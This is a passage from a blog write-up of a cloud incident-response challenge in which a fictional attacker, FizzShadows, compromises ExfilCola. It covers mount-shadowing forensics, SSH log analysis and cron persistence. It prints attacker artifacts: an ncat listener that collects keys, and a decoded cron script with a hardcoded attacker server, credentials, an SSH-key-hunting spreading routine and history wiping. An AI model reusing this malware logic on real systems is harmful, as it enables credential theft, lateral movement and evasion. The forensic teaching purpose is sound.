</pre></table></code></div></div><p>While not explicitly suspicious, there was a Socket connection referencing an internal ExfilCola host - <code class="language-plaintext highlighter-rouge">fetcher.exfilcola.io</code>. I attempted a number of ways to resolve the host IP including using machine’s nameserver (<code class="language-plaintext highlighter-rouge">192.168.65.7</code> - retrieved from <code class="language-plaintext highlighter-rouge">/etc/resolv.conf</code>), however all attempts were unsuccessful:</p><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250507094826.png" alt="img-description" data-proofer-ignore> <em>Failed Attempt at Host Resolution</em></p><h2 id="diving-in-to-the-files---bash-history"><span class="mr-2">Diving in to the Files - Bash History</span><a href="#diving-in-to-the-files---bash-history" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Checking the <code class="language-plaintext highlighter-rouge">bash_history</code> for the <strong>postgresql-user</strong> had a large number of repeated events. Using <code class="language-plaintext highlighter-rouge">grep -v</code>, I was able to narrow down the activity that I cared about:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>cat .bash_history | grep -v "get-caller-identity" | grep -v "aws lambda invoke"
</pre></table></code></div></div><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250506140649.png" alt="img-description" data-proofer-ignore> <em>Bash History for the Postgresql-user Account</em></p><p>As shown above, in addition to the repeated entries there were 3 unique commands:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>findmnt
nohup ncat --ssl -klp 8443 &gt; /tmp/.../keys_out.txt &amp;
cat /tmp/.../keys_out.txt
</pre></table></code></div></div><p>The attackers created a directory named <code class="language-plaintext highlighter-rouge">...</code> within the <code class="language-plaintext highlighter-rouge">/tmp</code> directory. At a quick glance, this made it look as if there was nothing in the directory itself (it also doesn’t show up if you do a basic <code class="language-plaintext highlighter-rouge">ls</code> command): <img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250508144717.png" alt="img-description" data-proofer-ignore> <em>Unique use of Directory Naming</em></p><p>Since we were able to confirm that the <code class="language-plaintext highlighter-rouge">...</code> directory existed, I ran a recursive list (<code class="language-plaintext highlighter-rouge">ls -laR</code>) command to view all of the files contained within the directory and subdirectories: <img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250506141637.png" alt="img-description" data-proofer-ignore> <em>Contents of the … Directory</em></p><p>Looking back at the commands from the <code class="language-plaintext highlighter-rouge">.bash_history</code> file, we can see that whatever activity the user performed with <code class="language-plaintext highlighter-rouge">ncat</code> was sent to <code class="language-plaintext highlighter-rouge">/tmp/.../keys_out.txt</code>. We’ve already viewed the <code class="language-plaintext highlighter-rouge">.gK8du9</code> file so I decided to take a look at the contents of the <code class="language-plaintext highlighter-rouge">keys_out.txt</code>:</p><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250506125659.png" alt="img-description" data-proofer-ignore> <em>Output from the keys_out.txt File</em></p><p>The excerpt above shows a list of names related to potentially compromised users. However, this still didn’t provide insight into how the attacker gained access into the machine.</p><h2 id="diving-in-to-the-files---bash-history-continued"><span class="mr-2">Diving in to the Files - Bash History Continued</span><a href="#diving-in-to-the-files---bash-history-continued" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Going back to the list of commands in <code class="language-plaintext highlighter-rouge">.bash_history</code>, the user ran <code class="language-plaintext highlighter-rouge">ncat</code> as well as <code class="language-plaintext highlighter-rouge">findmnt</code>. If you type in <code class="language-plaintext highlighter-rouge">findmnt</code>, a list of the available mounts will be displayed, including Source, Target, Filesystem Type, and Options:</p><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250508145353.png" alt="img-description" data-proofer-ignore> <em>Mounted File Systems on the Compromised Host</em></p><p>Similar information can be found by viewing the contents of the mounts file - <code class="language-plaintext highlighter-rouge">cat /proc/mounts</code>:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>overlay / overlay ro,relatime,lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/757/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/746/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/745/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/744/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/743/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/742/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/741/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/740/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/739/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/738/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/737/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/736/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/735/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/734/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/733/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/732/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/731/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/730/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/728/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/727/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/726/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/724/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/723/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/722/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/721/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/720/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/529/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/528/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/527/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/526/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/525/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/524/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/125/fs,upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/759/fs,workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/759/work 0 0
overlay /var/log overlay rw,relatime,lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/757/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/746/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/745/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/744/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/743/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/742/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/741/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/740/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/739/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/738/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/737/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/736/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/735/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/734/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/733/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/732/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/731/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/730/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/728/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/727/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/726/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/724/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/723/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/722/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/721/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/720/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/529/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/528/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/527/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/526/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/525/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/524/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/125/fs,upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/759/fs,workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/759/work 0 0
tmpfs /dev/null tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0
none /proc proc ro,relatime 0 0
overlay /var/log overlay ro,relatime,lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/757/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/746/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/745/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/744/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/743/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/742/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/741/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/740/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/739/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/738/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/737/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/736/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/735/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/734/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/733/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/732/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/731/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/730/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/728/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/727/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/726/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/724/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/723/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/722/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/721/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/720/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/529/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/528/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/527/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/526/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/525/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/524/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/125/fs,upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/759/fs,workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/759/work 0 0

</pre></table></code></div></div><p>As shown above, there were a number of mounted directories. The ones that were interesting to me were the overlay mounts. While the <code class="language-plaintext highlighter-rouge">overlay</code> mounts do exist on the host - we can see them in the <code class="language-plaintext highlighter-rouge">findmnt</code> output as well as the <code class="language-plaintext highlighter-rouge">/proc/mounts</code> file, all attempts to list the contents of the <code class="language-plaintext highlighter-rouge">lowerdir</code>, <code class="language-plaintext highlighter-rouge">upperdir</code>, or <code class="language-plaintext highlighter-rouge">workdir</code> mount points failed because <code class="language-plaintext highlighter-rouge">/var/lib/containerd</code> was <strong>not visible inside the container’s mount namespace</strong>.</p><h3 id="what-is-an-overlay-filesystem"><span class="mr-2">What is an Overlay Filesystem?</span><a href="#what-is-an-overlay-filesystem" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><blockquote class="prompt-info"><div><p>The <code class="language-plaintext highlighter-rouge">lowerdir</code> is designated for read-only access and serves as the base layer, the <code class="language-plaintext highlighter-rouge">upperdir</code> is the directory where all modifications are stored, acting as the writable layer, and the <code class="language-plaintext highlighter-rouge">workdir</code> is used for processing changes before they are finalized in the <code class="language-plaintext highlighter-rouge">upperdir</code> thus it is not included in the unified view. By accessing the filesystem through the <code class="language-plaintext highlighter-rouge">/mnt/location</code> mount point, you obtain a unified view that seamlessly integrates the <code class="language-plaintext highlighter-rouge">lowerdir</code> and <code class="language-plaintext highlighter-rouge">upperdir</code>. In a containerization environment, containers should run in separate environments; they have their own file systems. They utilize overlay filesystems to manage changes made while the container is running and can also share the same base image among other containers, thereby saving a significant amount of disk space.</p></div></blockquote><p>Generally, a mount is created using a command similar to:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>sudo mount -t overlay overlay -o lowerdir=/path/to/lower,upperdir=/path/to/upper,workdir=/tmp/overlay /path/to/mount
</pre></table></code></div></div><p>If you refer back to the <code class="language-plaintext highlighter-rouge">findmnt</code> output, there are a few overlay mount points: <code class="language-plaintext highlighter-rouge">/</code>, <code class="language-plaintext highlighter-rouge">-/var/log</code>, and <code class="language-plaintext highlighter-rouge">-/var/log</code> again. If you look closer at the Target Mounts, it seems as if there are multiple points mounted over <code class="language-plaintext highlighter-rouge">/var/log</code> directory.</p><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250507104635.png" alt="img-description" data-proofer-ignore> <em>Identifying Multiple Mount Overlays</em></p><p>This implies that an <strong>overlay filesystem</strong> (<code class="language-plaintext highlighter-rouge">/work/storage/a0cd15e0-370c-4693-83b6-f3c339f98450/log</code>) was mounted at <code class="language-plaintext highlighter-rouge">/var/log</code> and then <strong>another overlay filesystem</strong> (<code class="language-plaintext highlighter-rouge">/work/rootfs/tmp/.../mnt</code>) was mounted at the same point <code class="language-plaintext highlighter-rouge">/var/log</code>. When accessing the <code class="language-plaintext highlighter-rouge">/var/log</code> directory on the host, you would access the <strong>top-most (i.e., most recent) mount</strong> at that path indicated by the backtick (`) in the tree under <code class="language-plaintext highlighter-rouge">/var/log</code>. In Linux, if multiple filesystems are mounted on the same target (e.g., <code class="language-plaintext highlighter-rouge">/var/log</code>), only the <strong>last one mounted</strong> is visible — it <strong>“shadows”</strong> any previous mounts at the same location.</p><p>Therefore, when we accessed <code class="language-plaintext highlighter-rouge">/var/log</code>, we only saw the mount for the <code class="language-plaintext highlighter-rouge">/work/rootfs/tmp/.../mnt</code> overlay.</p><h2 id="accessing-the-shadowed-mount"><span class="mr-2">Accessing the “Shadowed” Mount</span><a href="#accessing-the-shadowed-mount" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>To get into the first mount point (<code class="language-plaintext highlighter-rouge">/work/storage/3c658cea-88f8-4d44-b590-f661d6185911/log</code>) we needed to find a way to remove the <code class="language-plaintext highlighter-rouge">/work/rootfs/tmp/.../mnt</code> directory. To perform this action, I used the <code class="language-plaintext highlighter-rouge">umount</code> command:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>umount /var/log
</pre></table></code></div></div><p>When running <code class="language-plaintext highlighter-rouge">umount</code> on a directory, only the <strong>top-most mount</strong> (the last one mounted on <code class="language-plaintext highlighter-rouge">/var/log</code>) will be unmounted.</p><ul><li>The underlying mount (the first overlay on <code class="language-plaintext highlighter-rouge">/var/log</code>) will <strong>still be mounted</strong>, and will become visible again.<li>So, after the <code class="language-plaintext highlighter-rouge">umount</code>, you’d still have <code class="language-plaintext highlighter-rouge">/var/log</code> mounted — just with a different filesystem (the previously shadowed one).</ul><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250507104812.png" alt="img-description" data-proofer-ignore> <em>Accessing the Shadowed Mount Point</em></p><h2 id="finding-the-ip-address-of-another-exfilcola-workload"><span class="mr-2">Finding the IP Address of another ExfilCola Workload</span><a href="#finding-the-ip-address-of-another-exfilcola-workload" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>To determine the IP address that formed the initial access point, we needed to look for successful connections into the environment. If you recall from earlier, the <code class="language-plaintext highlighter-rouge">postgresql-user</code> had a <code class="language-plaintext highlighter-rouge">.ssh</code> file in the home directory. I started off by viewing the <code class="language-plaintext highlighter-rouge">auth.log</code> file, searching for the expected user (<code class="language-plaintext highlighter-rouge">postgresql-user</code>), and only searching for successful connection attempts:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre> cat auth.log | grep -E postgresql-user | grep -E Accepted
</pre></table></code></div></div><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250507105200.png" alt="img-description" data-proofer-ignore> <em>Identifying IP Address of another ExfilCola Workload</em></p><p>As shown above, there were several Accepted SSH connections from the IP address - <code class="language-plaintext highlighter-rouge">102.54.197.238</code>.</p><ul><li><strong>Compromised User:</strong> postgresql-user<li><strong>Connection Type</strong>: SSH<li><strong>IP Address:</strong> 102.54.197.238</ul><blockquote class="prompt-info"><div><p>The investigation steps were correct and resulted in the successful submission of the flag: <strong>102.54.197.238</strong></p></div></blockquote><h1 id="challenge-5-now-youre-just-somebody-that-i-used-to-log">Challenge 5: Now you’re just somebody that I used to log</h1><blockquote><p>Wow, you rock! Now you know that the attacker has laterally moved from a workload within the organization to a high privileged machine, ssh-fetcher, via SSH. ExfilCola has granted you root access to the PostgreSQL service where this activity originated from. ExfilCola really doesn’t want to pay the ransom but can’t afford for the secret recipe to be published. Can you save the day? It seems like the attacker is persistent — literally… Delete the secret recipe from the attacker’s server.</p></blockquote><p>There are several methods that can be used to persist on Linux based machines, including:</p><ul><li>Persistence via SSH<li>Creating a Privileged Local Account<li>Unix Shell Configuration Modification<li>Persistence via Web Shell<li>Persistence vis Cron Jobs</ul><p>As this blog post is longer than I expected, I’m going to skip over all of the areas that I searched for persistence (SSH, Shell Modification’s, etc.) and dive straight in to Cron Job persistence. If you are interested in learning more about the different techniques, I recommend reading through the following blog posts:</p><ul><li><a href="https://www.elastic.co/security-labs/primer-on-persistence-mechanisms\">https://www.elastic.co/security-labs/primer-on-persistence-mechanisms\</a><li><a href="https://www.linode.com/docs/guides/linux-red-team-persistence-techniques/#hackersploit-red-team-series">https://www.linode.com/docs/guides/linux-red-team-persistence-techniques/#hackersploit-red-team-series</a><li><a href="https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/">https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/</a></ul><h2 id="searching-for-cron-job-persistence"><span class="mr-2">Searching for Cron Job Persistence</span><a href="#searching-for-cron-job-persistence" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>If you want to view all cron jobs on the host, the files commonly reside in the <code class="language-plaintext highlighter-rouge">/var/spool/cron/crontabs/</code> directory. Looking in this directory, we can see that a Cronjob has been created for the <code class="language-plaintext highlighter-rouge">postgres</code> user:</p><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250508151106.png" alt="img-description" data-proofer-ignore> <em>Identifying Cron Jobs on the Host</em></p><p>As an alternative, if you’re interested in listing the cronjobs available for your own user account, you can use the <code class="language-plaintext highlighter-rouge">crontab -l</code> command. However, that will only show the cronjobs associated with the logged in account. To get a list of all cronjobs, you can use the <code class="language-plaintext highlighter-rouge">-u</code> parameter while looping through all of the user’s on the machine:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>for user in $(cut -f1 -d: /etc/passwd); do crontab -u $user -l; done
</pre></table></code></div></div><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250507113545.png" alt="img-description" data-proofer-ignore> <em>Listing Cron Jobs for all Users</em></p><p>You can modify the command to include the user account that each Cron job belongs to by adding the <code class="language-plaintext highlighter-rouge">$user</code> variable to the output:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done
</pre></table></code></div></div><h2 id="investigating-the-postgres-users-cronjob"><span class="mr-2">Investigating the Postgres User’s Cronjob</span><a href="#investigating-the-postgres-users-cronjob" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>As shown above, the <strong>postgres</strong> user had a cronjob enabled. Looking into the file (<code class="language-plaintext highlighter-rouge">pg_sched</code>) revealed a base64 encoded object:</p><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250508151258.png" alt="img-description" data-proofer-ignore> <em>Output of the pg_sched file</em></p><p>After base64 decoding the object, we ended up with the following script:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
</pre><td class="rouge-code"><pre>#!/bin/bash

# List of interesting policies
VULNERABLE_POLICIES=("AdministratorAccess" "PowerUserAccess" "AmazonS3FullAccess" "IAMFullAccess" "AWSLambdaFullAccess" "AWSLambda_FullAccess")

SERVER="34.118.239.100"
PORT=4444
USERNAME="FizzShadows_1"
PASSWORD="Gx27pQwz92Rk"
CREDENTIALS_FILE="/tmp/c"

SCRIPT_PATH="$(cd -- "$(dirname -- "${BASH_SOURCE[0]}")" &amp;&gt;/dev/null &amp;&amp; pwd)/$(basename -- "${BASH_SOURCE[0]}")"

# Check if a command exists
check_command() {
    if ! command -v "$1" &amp;&gt; /dev/null; then
        install_dependency "$1"
    fi
}

# Install missing dependencies
install_dependency() {
    local package="$1"
    if [[ "$package" == "curl" ]]; then
        apt-get install curl -y &amp;&gt; /dev/null
                yum install curl -y &amp;&gt; /dev/null
    elif [[ "$package" == "unzip" ]]; then
        apt-get install unzip -y &amp;&gt; /dev/null
                yum install unzip -y &amp;&gt; /dev/null
    elif [[ "$package" == "aws" ]]; then
        install_aws_cli
    fi
}

# Install AWS CLI locally
install_aws_cli() {
    mkdir -p "$HOME/.aws-cli"
    curl -s "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "$HOME/.aws-cli/awscliv2.zip"

    unzip -q "$HOME/.aws-cli/awscliv2.zip" -d "$HOME/.aws-cli/"

    "$HOME/.aws-cli/aws/install" --install-dir "$HOME/.aws-cli/bin" --bin-dir "$HOME/.aws-cli/bin"

    # Add AWS CLI to PATH
    export PATH="$HOME/.aws-cli/bin:$PATH"
    echo 'export PATH="$HOME/.aws-cli/bin:$PATH"' &gt;&gt; "$HOME/.bashrc"
}


# Try to spread
spread_ssh() {
    find_and_execute() {
        local KEYS=$(find ~/ /root /home -maxdepth 5 -name 'id_rsa*' | grep -vw pub;
 spread_ssh
        cat /dev/null &gt; ~/.bash_history
fi
</pre></table></code></div></div><p>Based on the file contents, we now had potentially valid credentials and IP address information for the FizzShadows server:</p><ul><li><strong>IP Address:</strong> 34.118.239.100<li><strong>Port:</strong> 4444<li><strong>Username:</strong> FizzShadows_1<li><strong>Password:</strong> Gx27pQwz92Rk</ul><p>I attempted to create a connection using the credentials but my attempts failed (if you find a method to do it, please let me know!). Since the machine didn’t have <code class="language-plaintext highlighter-rouge">nmap</code> installed, the next technique that I tested was using <code class="language-plaintext highlighter-rouge">cURL</code> to determine if the IP address was hosting a web application:</p><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250507140424.png" alt="img-description" data-proofer-ignore> <em>FizzShadows Web Server</em></p><p>After running the <code class="language-plaintext highlighter-rouge">cUrl</code> command (<code class="language-plaintext highlighter-rouge">curl -kv 34.118.239.100</code>), the web server showcased the following “Available Endpoints”:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre><td class="rouge-code"><pre>Available Endpoints:
------------------

1. List All Files
   GET /files
   Returns a list of all files in the system.

2. Upload File
   POST /files/upload
   Upload a new file to the system.

3. Download File
   GET /files/{filename}
   Download a specific file by name.

4. Delete File
   DELETE /files/{filename}
   Remove a file from the system.
</pre></table></code></div></div><p>At this point we were finally closing in on our initial goal: “Confirm whether FizzShadows actually has access to the data that they claim to have”. Using the <code class="language-plaintext highlighter-rouge">files</code> endpoint, my hope was that we would be able to identify the files stolen from ExfilCola:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>curl -kv 34.118.239.100/files
</pre></table></code></div></div><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250508151700.png" alt="img-description" data-proofer-ignore> <em>FizzShadows Authentication Error</em></p><p>As shown above, attempts to view the files resulted in an authentication error. To authenticate to the web server, I used the credentials from the script file and created a Basic Authentication request:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>curl -kv 34.118.239.100/files -u "FizzShadows_1:Gx27pQwz92Rk"
